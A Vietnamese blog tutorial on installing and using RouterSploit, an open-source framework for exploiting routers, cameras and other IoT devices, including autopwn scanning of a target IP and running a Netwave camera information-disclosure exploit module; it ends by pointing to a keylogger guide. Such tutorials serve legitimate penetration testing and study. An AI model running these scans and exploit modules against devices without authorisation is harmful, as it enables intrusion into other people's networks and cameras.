Bảo Mật

Routersploit: khai thác lỗ hổng bảo mật của Router và thiết bị mạng

RouterSploit là một framework khai thác mã nguồn mở dành riêng cho các thiết bị nhúng – IoT. Công cụ này được phát triển bằng ngôn ngữ python, và do được viết bằng python, nên bạn chỉ cần 1 hệ điều hành cài đặt được python như windows, linux, macOS là có thể chạy được RouterSploit. RouterSploit khai thác thiết bị IoT dựa trên các lỗ hổng đã biết của các nhà sản xuất thiết bị như router mạng, camera, đồ dùng thông minh như bóng đèn, hệ thống cảnh báo trộm,….

Routersploit: Công cụ khai thác tự động các thiết bị IoT

RouterSploit bao gồm các module khác nhau hỗ trợ cho các hoạt động kiểm tra thâm nhập:

  • exploits – modules tận dụng các lỗ hổng đã xác định
  • creds – modules được thiết kế để kiểm tra thông tin xác thực đối với các dịch vụ mạng
  • scanners – modules kiểm tra xem mục tiêu có dễ bị khai thác hay không
  • payloads – modules chịu trách nhiệm tạo ra payload cho các kiến ​​trúc và điểm injection khác nhau
  • generic – modules thực hiện các cuộc tấn công chung

Cách cài đặt RouterSploit

Yêu cầu cần thiết

Để chạy công cụ RouterSploit, bạn cần cài đặt:

  • future
  • requests
  • paramiko
  • pysnmp
  • pycrypto
  • bluepy – bluetooth low energy (không bắt buộc)

Cài đặt trên Kali Linux

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Hỗ trợ Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Cài đặt trên Ubuntu 20.04

sudo apt-get install git python3-pip
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Hỗ trợ Bluetooth Low Energy:

sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Cài đặt trên Ubuntu 18.04 & 17.10

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Hỗ trợ Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Cài đặt trên OSX

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Cài đặt trên Docker

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Cập nhật

Bạn nên cập nhật RouterSploit thường xuyên vì dự án này đang được phát triển mạnh và các modules mới được phát hành hầu như mỗi ngày.

cd routersploit
git pull

Cách sử dụng RouterSploit

Sau khi cài đặt xong, các bạn truy cập vào thư mục routersploit vừa clone về, và chạy lệnh sau:

cd routersploit
python3 rsf.py

Cách sử dụng RouterSploit

Tiếp theo, các bạn cần biết được IP của đối tượng mình muốn kiểm tra. Sau khi lấy được IP rồi, các bạn gõ lệnh sau để kiểm tra đối tượng trong mạng LAN hoặc môi trường internet:

rsf > use scanners/autopwn
rsf (AutoPwn) > set target 192.168.1.254
run

Routersploit sẽ bắt đầu kiểm tra đối tượng và tìm lỗ hổng, những lỗ hổng nào được tìm thấy sẽ có hình dấu cộng màu xanh ở bên trái. Trường hợp bên dưới, do không tìm thấy lỗ hổng nào nên các bạn sẽ không thấy dấu cộng màu xanh.

hack router bằng Routersploit

Còn nếu các bạn gặp trường hợp thấy dấu cộng màu xanh giống như hình dưới đây thì routersploit đã tìm ra lỗ hổng rồi đó.

tìm lỗ hổng bảo mật với routersploit

Đây là lỗ hổng liên quan đến camera và được tìm thấy ở port 82. Tiếp theo, các bạn chạy lệnh sau để bắt đầu khai thác lỗ hổng đó.

use exploits/cameras/multi/netwave_ip_camera_information_disclosure
set target {ip-victim}
show option
set port 82

hack thiết bị mạng với routersploit

Sau khi set lỗ hổng, IP, và port, các bạn gõ tiếp lệnh run để bắt đầu quá trình khai thác.

quét lỗ hổng thiết bị router

Vậy là các bạn đã khai thác lỗ hổng thành công rồi đó. Routersploit là bộ công cụ rất tiện lợi, nhanh và nhẹ, phù hợp cho các trường hợp bạn muốn quét nhanh các thiết bị nghi ngờ có lỗ hổng bảo mật. Ngoài ra, bạn cũng có thể tạo keylogger bằng python tại đây.

Đánh giá post

Rất Hữu ích

RatHuuIch là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. RatHuuIch cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bài liên quan

Theo dõi
Thông báo của
guest

0 Góp ý
Phản hồi nội tuyến
Xem tất cả bình luận
Check Also
Close
Back to top button